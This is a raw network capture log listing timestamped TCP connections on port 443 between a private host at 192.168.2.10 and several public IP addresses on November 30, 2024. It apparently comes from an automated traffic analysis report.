                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.255192995 CET4435005513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.255641937 CET50055443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.255647898 CET4435005513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.264611006 CET50054443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.264657974 CET4435005413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.306596041 CET49875443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.306628942 CET49876443192.168.2.10172.64.41.3
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.306633949 CET44349875172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.306663036 CET44349876172.64.41.3192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.700555086 CET4435005513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.703676939 CET4435005513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.707210064 CET50055443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.723968029 CET4435005613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.738356113 CET50055443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.738387108 CET4435005513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.738399029 CET50055443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.738404989 CET4435005513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.754632950 CET50056443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.754652023 CET4435005613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.758570910 CET50056443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.758577108 CET4435005613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.771435022 CET50061443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.771477938 CET4435006113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.771600008 CET50061443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.775656939 CET50061443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:35.775671959 CET4435006113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.158679008 CET4435005613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.158716917 CET4435005613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.158783913 CET4435005613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.158792973 CET50056443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.158857107 CET50056443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.159099102 CET50056443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.159099102 CET50056443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.159111977 CET4435005613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.159126043 CET4435005613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.162354946 CET50062443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.162385941 CET4435006213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.162472010 CET50062443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.162749052 CET50062443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.162764072 CET4435006213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.218962908 CET4435005713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.219430923 CET50057443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.219445944 CET4435005713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.220033884 CET50057443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.220038891 CET4435005713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.675267935 CET4435005813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.675793886 CET50058443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.675810099 CET4435005813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.676258087 CET50058443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.676263094 CET4435005813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.702919960 CET4435005713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.706315041 CET4435005713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.706407070 CET50057443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.706435919 CET50057443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.706435919 CET50057443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.706449986 CET4435005713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.706459999 CET4435005713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.709208965 CET50063443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.709250927 CET4435006313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.709341049 CET50063443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.709454060 CET50063443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:36.709475040 CET4435006313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.128271103 CET4435005813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.132237911 CET4435005813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.132297039 CET4435005813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.132375956 CET50058443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.132453918 CET50058443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.132453918 CET50058443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.132472992 CET4435005813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.132482052 CET4435005813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.135401011 CET50064443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.135440111 CET4435006413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.135529041 CET50064443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.135740995 CET50064443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.135752916 CET4435006413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.619643927 CET4435006113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.622941971 CET50061443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.622965097 CET4435006113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.623411894 CET50061443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.623418093 CET4435006113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.942528963 CET4435006213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.943209887 CET50062443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.943221092 CET4435006213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.943608046 CET50062443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:37.943613052 CET4435006213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.072540045 CET4435006113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.072571993 CET4435006113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.072629929 CET4435006113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.072791100 CET50061443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.072791100 CET50061443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.072952986 CET50061443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.072972059 CET4435006113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.072983980 CET50061443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.072992086 CET4435006113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.076282978 CET50065443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.076333046 CET4435006513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.076476097 CET50065443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.076615095 CET50065443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.076638937 CET4435006513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.386133909 CET4435006213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.389487028 CET4435006213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.389554977 CET50062443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.389755011 CET50062443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.389782906 CET4435006213.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.395407915 CET50066443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.395443916 CET4435006613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.395550966 CET50066443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.399827003 CET50066443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.399840117 CET4435006613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.571302891 CET4435006313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.571798086 CET50063443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.571820021 CET4435006313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.572304964 CET50063443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.572314024 CET4435006313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.725614071 CET49935443192.168.2.10104.70.121.147
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.725667953 CET44349935104.70.121.147192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.725805044 CET49936443192.168.2.10104.70.121.147
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.725847960 CET44349936104.70.121.147192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.828737020 CET49938443192.168.2.10204.79.197.219
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.828771114 CET44349938204.79.197.219192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.893892050 CET49937443192.168.2.10204.79.197.219
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.893924952 CET44349937204.79.197.219192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.982255936 CET4435006413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.982822895 CET50064443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.982846022 CET4435006413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.983294964 CET50064443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:38.983300924 CET4435006413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.026386023 CET4435006313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.029627085 CET4435006313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.029676914 CET4435006313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.029696941 CET50063443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.029746056 CET50063443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.029808044 CET50063443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.029829025 CET4435006313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.029841900 CET50063443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.029848099 CET4435006313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.032922983 CET50067443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.032962084 CET4435006713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.033057928 CET50067443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.033252954 CET50067443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.033267021 CET4435006713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.397705078 CET4435005913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.398525000 CET50059443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.398536921 CET4435005913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.399281025 CET50059443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.399286032 CET4435005913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.435667038 CET4435006413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.439459085 CET4435006413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.439552069 CET50064443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.439639091 CET50064443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.439661980 CET4435006413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.439728022 CET50064443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.439734936 CET4435006413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.442820072 CET50068443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.442851067 CET4435006813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.443147898 CET50068443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.443147898 CET50068443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.443180084 CET4435006813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.832415104 CET4435005913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.836049080 CET4435005913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.836194992 CET50059443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.836231947 CET50059443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.836231947 CET50059443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.836247921 CET4435005913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.836256981 CET4435005913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.839132071 CET50069443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.839178085 CET4435006913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.839267969 CET50069443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.839412928 CET50069443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:39.839422941 CET4435006913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.099961996 CET50070443192.168.2.1023.219.82.58
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.100013018 CET4435007023.219.82.58192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.100097895 CET50070443192.168.2.1023.219.82.58
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.100328922 CET50070443192.168.2.1023.219.82.58
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.100346088 CET4435007023.219.82.58192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.245433092 CET4435006613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.245991945 CET50066443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.246005058 CET4435006613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.246465921 CET50066443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.246478081 CET4435006613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.434145927 CET50071443192.168.2.1023.44.133.59
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.434205055 CET4435007123.44.133.59192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.434282064 CET50071443192.168.2.1023.44.133.59
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.434525967 CET50071443192.168.2.1023.44.133.59
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.434541941 CET4435007123.44.133.59192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.494841099 CET50072443192.168.2.1023.44.133.38
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.494888067 CET4435007223.44.133.38192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.494982958 CET50072443192.168.2.1023.44.133.38
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.495232105 CET50072443192.168.2.1023.44.133.38
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.495245934 CET4435007223.44.133.38192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.698661089 CET4435006613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.702439070 CET4435006613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.702512980 CET4435006613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.702552080 CET50066443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.702599049 CET50066443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.702785969 CET50066443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.702800035 CET4435006613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.702852011 CET50066443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.702857971 CET4435006613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.705785990 CET50073443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.705846071 CET4435007313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.705944061 CET50073443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.706091881 CET50073443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.706106901 CET4435007313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.748831987 CET4435006713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.749696970 CET50067443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.749713898 CET4435006713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.750161886 CET50067443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:40.750166893 CET4435006713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.161125898 CET4435006813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.161890030 CET50068443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.161914110 CET4435006813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.162288904 CET50068443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.162295103 CET4435006813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.187509060 CET4435006713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.190586090 CET4435006713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.190653086 CET50067443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.190773010 CET50067443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.190773010 CET50067443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.190802097 CET4435006713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.190812111 CET4435006713.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.194020987 CET50074443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.194067955 CET4435007413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.194171906 CET50074443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.194355011 CET50074443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.194370031 CET4435007413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.403954983 CET4435007023.219.82.58192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.404455900 CET50070443192.168.2.1023.219.82.58
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.404500961 CET4435007023.219.82.58192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.405580997 CET4435007023.219.82.58192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.405648947 CET50070443192.168.2.1023.219.82.58
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.406697035 CET50070443192.168.2.1023.219.82.58
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.406784058 CET4435007023.219.82.58192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.452584982 CET50070443192.168.2.1023.219.82.58
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.452606916 CET4435007023.219.82.58192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.499419928 CET50070443192.168.2.1023.219.82.58
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.595956087 CET4435006813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.599323034 CET4435006813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.599472046 CET50068443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.599472046 CET50068443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.599505901 CET50068443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.599520922 CET4435006813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.602602959 CET50075443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.602653980 CET4435007513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.603410959 CET50075443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.603574038 CET50075443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.603585958 CET4435007513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.687588930 CET4435006913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.688204050 CET50069443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.688242912 CET4435006913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.688683033 CET50069443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.688688993 CET4435006913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.691350937 CET4435007123.44.133.59192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.691720009 CET50071443192.168.2.1023.44.133.59
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.691730022 CET4435007123.44.133.59192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.692768097 CET4435007123.44.133.59192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.692842960 CET50071443192.168.2.1023.44.133.59
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.694514036 CET50071443192.168.2.1023.44.133.59
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.694581032 CET4435007123.44.133.59192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.694622993 CET50071443192.168.2.1023.44.133.59
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.739340067 CET4435007123.44.133.59192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.749412060 CET50071443192.168.2.1023.44.133.59
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.749428988 CET4435007123.44.133.59192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.754744053 CET4435007223.44.133.38192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.755038977 CET50072443192.168.2.1023.44.133.38
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.755048037 CET4435007223.44.133.38192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:41.755392075 CET4435007223.44.133.38192.168.2.10
